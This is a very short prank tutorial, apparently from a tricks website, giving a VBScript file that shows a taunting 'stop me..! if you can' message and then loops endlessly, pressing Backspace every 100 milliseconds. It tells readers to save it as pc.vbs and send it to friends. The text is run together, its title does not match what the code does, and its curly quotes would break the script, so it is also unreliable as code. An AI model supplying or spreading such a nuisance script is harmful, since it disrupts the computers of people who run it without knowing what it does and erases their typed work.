Make Keyboard Keys Type Continuously
Type :
MsgBox “stop me..! if you can”Save it as pc.vbs and send it to your friends.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop